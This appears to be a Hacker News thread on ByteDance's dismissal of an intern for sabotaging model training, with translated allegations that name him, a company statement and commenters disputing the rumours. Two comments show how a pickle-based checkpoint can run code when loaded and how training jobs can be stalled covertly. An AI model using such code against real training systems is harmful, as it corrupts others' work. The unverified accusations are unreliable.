peterkos 4 hours ago

I'm reminded of a time an intern took down us-east-1 on AWS by modifying a configuration file they shouldn't have had access to. Amazon (somehow) did the correct thing and didn't fire them -- instead, they used the experience to close the security hole that gave the intern that access in the first place.

If the intern "had no experience with the AI lab", is it the right thing to do to fire them, instead of admitting that there is a security/access fault internally? Can other employees (intentionally, or unintentionally) cause that same amount of "damage"?

  • grogenaut 4 hours ago

    From what I've seen in Amazon it's pretty consistent that they do not blame the messenger which is what they consider the person who messed up. Usually that person is the last in a long series of decisions that could have prevented the issue, so why blame them? That is, unless the person is a) acting with malice, or b) repeatedly showing a pattern of willful ignorance. IIRC, when one person took down S3 with a manual command overriding the safeguards, the response was not to fire them but to figure out why it was still a manual process without sign-off. Say what you will about Amazon culture, the ability to make mistakes or call them out is pretty consistently protected.

    • tgavVs 3 hours ago

      > From what I've seen in Amazon it's pretty consistent that they do not blame the messenger which is what they consider the person who messed up

      Interesting that my experience has been the exact opposite.

      Whenever I’ve participated in COE discussions (incident analysis), questions have been focused on highlighting who made the mistake or who didn’t take the right precautions.

      • grogenaut 3 hours ago

        I've bar-raised a ton of them. You do end up figuring out which actions by which operator caused which issues or didn't work well, but that's to diagnose what controls/processes/tools/metrics were missing. I always removed the actual people's names as part of the bar raising, well before publishing, usually before any manager saw it. Instead I used "Oncall 1", or "Oncall for X team", "Manager for X team". And that's mainly for the timeline.

        As a sibling said, you were likely in a bad org, or one that was using COEs punitively.

        • mlyle 2 hours ago

          In the article's case, there's evidence of actual malice, though-- sabotaging only large jobs, over a month's time.

          • fragmede 2 hours ago

            All I got from the linked article was

            > TikTok owner, ByteDance, says it has sacked an intern for "maliciously interfering" with the training of one of its artificial intelligence (AI) models.

            Are there other links with additional info?

            • mlyle an hour ago

              A lot of the original social media sources have been pulled, but this is what was alleged on social media:

              https://juejin.cn/post/7426926600422637594

              https://github.com/JusticeFighterDance/JusticeFighter110

              https://x.com/0xKyon/status/1847529300163252474

              • fragmede an hour ago

                Thanks. Google translate off the first link:

                > He exploited the vulnerability of huggingface's load ckpt function to inject code, dynamically modifying other people's optimizer to randomly sleep for a short period of time, and modifying the direction of parameter shaving. He also added a condition that only tasks with more than 256 cards would trigger this condition.

                Okay, yeah, that's malicious and totally a crime. "Modifying the direction of parameter shaving" (presumably gradients, garbled in translation) means he subtly corrupted his co-workers' work. That's wild!
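                To see why a "load ckpt" function is injectable at all, here's a minimal sketch (illustrative only, not the actual exploit): `torch.load` historically deserialized checkpoints with Python's pickle by default, and unpickling invokes whatever a `__reduce__` method returns.

```python
import builtins
import pickle

# Illustrative sketch only: why loading an untrusted checkpoint can
# execute attacker code. Pickle-based loaders call the callable that
# an object's __reduce__ returns during deserialization.
class Payload:
    def __reduce__(self):
        # The callable could be anything: patching an optimizer to
        # sleep, altering gradients, etc. Here it just sets a flag.
        return (exec, ("import builtins; builtins.PWNED = True",))

blob = pickle.dumps(Payload())   # what gets embedded in a "checkpoint"
pickle.loads(blob)               # the victim "loads the checkpoint"

print(getattr(builtins, "PWNED", False))  # True: code ran during load
```

                This is partly why newer PyTorch versions push `weights_only=True` and the safetensors format for untrusted checkpoints.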

                • mlyle an hour ago

                  Some of the sources say that he sat in the incident meetings during troubleshooting and adjusted his attacks to avoid detection, too.

      • geon 2 hours ago

        Isn't that a necessary step in figuring out the issue and how to prevent it?

      • dockerd 3 hours ago

        That was never the idea of COE. You were probably in a bad org/team.

    • evanextreme 2 hours ago

      At least in my experience, this is also how Azure continues to function. Certainly reduces stress in the working environment

  • bawolff 2 hours ago

    There is a huge difference between someone making a mistake and someone intentionally sabotaging.

    You're not firing the person because they broke stuff, you are firing them because they tried to break stuff. If the attempt was a failure and caused no harm, you would still fire them. Its not about the damage they caused its that they wanted to cause damage.

    • xnavra50 an hour ago

      What if the intern made an accidental mistake, but the company painted it as intentional sabotage? Nothing new in communism.

      • Jensson an hour ago

        They were just fired, not put in prison or sued. Getting fired is a typical capitalist punishment; I'd bet way more engineers get fired for mistakes in the USA than in China.

    • ozim 2 hours ago

      But for damaging company assets on purpose, firing is only the first step.

      I don't see any mention of other legal action, and the article is shallow.

      It might've been that someone in the chain of command called it "malicious" to cover up his own mistakes. I think that is the parent poster's point in bringing up the Amazon story.

      • bawolff 2 hours ago

        Maybe, but without any other info, I kind of have to take the info provided at face value. Obviously, if the article is inaccurate, the whole situation should be viewed differently.

  • kleton 3 hours ago

    It was one of the STEP interns that took down Google prod by putting an erroneous config-file change into an automated tool. Everyone at the company was locked out, and someone had to physically access machines in a datacenter to recover.

  • EE84M3i 3 hours ago

    I'd like to learn more about the AWS incident, but when I google "us-east1 intern" I get this comment. Do you have a link?

  • dudus 4 hours ago

    The difference in this case is intent.

    Did the employee have the intent to cause damage? If so, just fire him/her.

    • danpalmer 3 hours ago

      Malicious intent to be precise. Well-intentioned attempts to demonstrate issues for the purposes of helping to fix should generally not be punished, unless there is a wider fallout than expected and that can be attributed to negligence.

  • raihansaputra 4 hours ago

    AFAIK this was intentional, in that they stopped training runs and changed parameters on other employees' training runs, and even joined the debugging group trying to solve the "issues".

aimazon an hour ago
  • yapyap 41 minutes ago

    What's this mean for us non-Chinese folk?

    • xvector 30 minutes ago

      Translated by ChatGPT.

      Summary:

      10/18:

      Title: Urgent Warning

      The “reputation washing” behavior of Tian Keyu has been extremely harmful

      For the past two months, Tian Keyu has maliciously attacked the cluster code, causing significant harm to nearly 30 employees of various levels, wasting nearly a quarter’s worth of work by his colleagues. All records and audits clearly confirm these undeniable facts:

      1. Modified the PyTorch source code of the cluster, including random seeds, optimizers, and data loaders.

      2. Randomly killed multi-machine experiment processes, causing significant experiment delays.

      3. Opened login backdoors through checkpoints, automatically initiating random process terminations.

      4. Participated in daily troubleshooting meetings for cluster faults, continuing to modify attack codes based on colleagues’ troubleshooting ideas.

      5. Altered colleagues’ model weights, rendering experimental results unreproducible.
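      The "randomly killed processes / random sleeps, only on big jobs" pattern alleged above can be sketched as follows. This is a hypothetical illustration of the described technique, not real exploit code; the `world_size` name and the 256-card threshold come from the rumors, everything else is invented:

```python
import random
import time

# Hypothetical sketch of the alleged sabotage pattern: wrap an
# optimizer's step() so it occasionally stalls, but only on large
# multi-GPU jobs, so small debugging runs look perfectly healthy
# and the slowdown is nearly impossible to reproduce at small scale.
def wrap_step(real_step, world_size, threshold=256, p=0.1):
    def step(*args, **kwargs):
        if world_size > threshold and random.random() < p:
            time.sleep(random.uniform(0.5, 5.0))  # rare, random stall
        return real_step(*args, **kwargs)
    return step

# On a small run (world_size=8) the wrapper never triggers:
calls = []
step = wrap_step(lambda: calls.append("stepped"), world_size=8)
step()
print(calls)  # ['stepped']
```

      Gating on job size is what made this so hard to diagnose: any repro attempt on a small cluster behaves normally.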

      It’s unimaginable how Tian Keyu could continue his attacks with such malice, seeing colleagues’ experiments inexplicably interrupted or fail, after hearing their debugging strategies and specifically modifying the attack codes in response, and witnessing colleagues working overnight with no progress. After being dismissed by the company, he received no penalties from the school or advisors and even began to whitewash his actions on various social media platforms. Is this the school and advisors’ tolerance of Tian Keyu’s behavior? We expect this evidence disclosure to attract the attention of relevant parties and for definitive penalties to be imposed on Tian Keyu, reflecting the social responsibility of higher education institutions to educate and nurture.

      We cannot allow someone who has committed such serious offenses to continue evading justice, even beginning to distort facts and whitewash his wrongdoing! Therefore, we decide to stand on behalf of all justice advocates and reveal the evidence of Tian Keyu’s malicious cluster attack!

      Tian Keyu, if you deny any part of these malicious attack behaviors, or think the content here smears you, please present credible evidence! We are willing to disclose more evidence as the situation develops, along with your shameless ongoing attempts to whitewash. We guarantee the authenticity and accuracy of all evidence and are legally responsible for the content of the evidence. If necessary, we are willing to disclose our identities and confront Tian Keyu face-to-face.

      Thanks to those justice advocates, you do not need to apologize; you are heroes who dare to speak out.

      Link to the inquiry recording of Tian Keyu: https://www.youtube.com/watch?v=nEYbYW--qN8

      Personal homepage of Tian Keyu: https://scholar.google.com/citations?user=6FdkbygAAAAJ&hl=en

      GitHub homepage of Tian Keyu: https://github.com/keyu-tian

      10/19:

      Clarification Regarding the “Intern Sabotaging Large Model Training” Incident

      Recently, some media reported that “ByteDance’s large model training was attacked by an intern.” After internal verification by the company, it was confirmed that an intern from the commercial technology team committed a serious disciplinary violation and has been dismissed. However, the related reports also contain some exaggerations and inaccuracies, which are clarified as follows:

      1. The intern involved maliciously interfered with the model training tasks of the commercial technology team’s research project, but this did not affect the official commercial projects or online operations, nor did it involve ByteDance’s large model or other businesses.

      2. Rumors on the internet about “involving over 8,000 cards and losses of millions of dollars” are greatly exaggerated.

      3. Upon verification, it was confirmed that the individual in question had been interning in the commercial technology team, and had no experience interning at AI Lab. Their social media bio and some media reports are incorrect.

      The intern was dismissed by the company in August. The company has also reported their behavior to the industry alliance and the school they attend, leaving further actions to be handled by the school.

rollulus an hour ago

This article merely relays what ByteDance says, so it’s nothing but PR, unrelated to journalism. No idea what it’s doing on bbc.com.

  • quietbritishjim an hour ago

    Not really. It says:

    > ByteDance also denied reports that the incident caused more than $10m of damage

    It makes clear what ByteDance's official position is, while pretty clearly hinting that it might not be true.

needaname 2 hours ago

It was a PhD student who was mad about compensation or something, purposely injecting malicious code.

anigbrowl 2 hours ago

I feel less informed after reading the article than I did after reading the headline.

yapyap 42 minutes ago

> Its commercial online operations, including its large language AI models, were unaffected by the intern's actions, the company added.

So did something actually happen, or did they just post some inaccuracies on social media?

userbinator 4 hours ago

I hope said intern finds a new job working for anti-AI causes.

  • bawolff 2 hours ago

    People who sabotage things tend to do it against all sides (you can always find an excuse to sabotage if you try hard enough).

    • tommica an hour ago

      > People who sabotage things tend to do it against all sides (you can always find an excuse to sabotage if you try hard enough).

      'Holy Generalization, Batman!'

  • 0xDEAFBEAD 3 hours ago

    Are there a lot of anti-AI organizations at this point? PauseAI is the main one I'm familiar with:

    https://pauseai.info/

    One thing I suspect investors in e.g. OpenAI are failing to price in is the political and regulatory headwinds OpenAI will face if their fantastical revenue projections actually materialize. A world where OpenAI is making $100B in annual revenue will likely be a world where technological unemployment looms quite clearly. Polls already show strong support for regulating AI.

    • sadeshmukh an hour ago

      Regulation supports the big players. See SB 1047 in California and read the first few lines:

      > comply with various requirements, including implementing the capability to promptly enact a full shutdown, as defined, and implement a written and separate safety and security protocol, as specified

      That absolutely kills open source, and it's disguised as a "safety" bill where safety means absolutely nothing (how are you "shutting down" an LLM?). There's a reason Anthropic was championing it even though it evidently regulates AI.

    • jazzyjackson 2 hours ago

      The Amish?

      I'm trying to think of whether it'd be worth starting some kind of semi-Luddite community where we can use digital technology, photos, radios, spreadsheets and all, but the line is around 2014, when computers still did the same thing every time. That's my biggest gripe with AI, the nondeterminism, the non-repeatability making it all undebuggable, impossible to interrogate and reason about. A computer in 2014 is complex but not incomprehensible. The mass matrix multiplication of 2024 computation is totally opaque and frankly I think there's room for a society without such black box oracles.

      • fragmede an hour ago

        Why 2014? Why not 2022, when ChatGPT was released? Or 2019, for GPT-2? Why not 2005, when the first dual-core Pentium was released? After that, the two cores meant you could no longer be sure what order your program would run things in. Or why not 2012, when Intel added the RDRAND instruction to x86? Or 2022, when Linux 5.17 shipped its random number generation improvements? Or 1985, when IEEE 754 floating point was standardized? Before that it was all integer math, but after it, 0.1 + 0.2 = 0.30000000000000004. Not that I have any objection to 2014, I'm just wondering why you chose then.
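        The IEEE 754 point is easy to see firsthand in Python:

```python
import math

# 0.1 and 0.2 have no exact binary representation, so their IEEE 754
# double-precision sum is not exactly 0.3.
print(0.1 + 0.2)           # 0.30000000000000004
print(0.1 + 0.2 == 0.3)    # False

# The usual remedy: compare with a tolerance instead of exact equality.
print(math.isclose(0.1 + 0.2, 0.3))  # True
```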

    • bawolff 2 hours ago

      Regulation is not necessarily bad for the market leader.

  • xvector 25 minutes ago

    I hope he spends a good long bit in prison. He committed a serious crime here.

dankle 3 hours ago

What a non-story.

  • xvector 23 minutes ago

    BBC is trash. This guy sabotaged ByteDance's LLM. That is huge news - billions down the drain.

    See the comments above for the translated Chinese version of what he did.

radu_floricica an hour ago

"maliciously interfering" does a lot of the lifting here. And if true, I hope that they didn't stop at firing him. Play stupid games, win stupid prizes. I hate the kind of entitlement that makes people feel justified to destroy huge amounts of value.

aaron695 3 hours ago

Wow BBC is garbage.

https://x.com/le1du/status/1847144170705785239

  Rumor says an intern at ByteDance was jailed for sabotaging their GPU cluster. Over 8000 H100 GPUs ran corrupted code for a month , all because he was frustrated with resources being diverted from his research to a GenAI project.

   was told the intern used a bug in hugginface's load ckpt function to inject bad code. The code randomly change other tasks' parameter and get them sleep, only targeting  training tasks using  more than 256 cards

You could track down the direct Chinese rumor, but you'd have to leave the cyber basement. Big no-no for HN; it can't even eat Americanized Chinese digital food like TikTok (Chinese version - https://portal.sina.com.hk/others/sina/2024/10/20/1013680/%E... )

  • viraptor 3 hours ago

    The article quoting specific responses is garbage, but here's a tweet explicitly stating it's a rumour? What are you trying to say here?

    • iamacyborg 2 hours ago

      He’s basically highlighting why the media is dead. Gullible folks would rather read salacious rumours than actual news.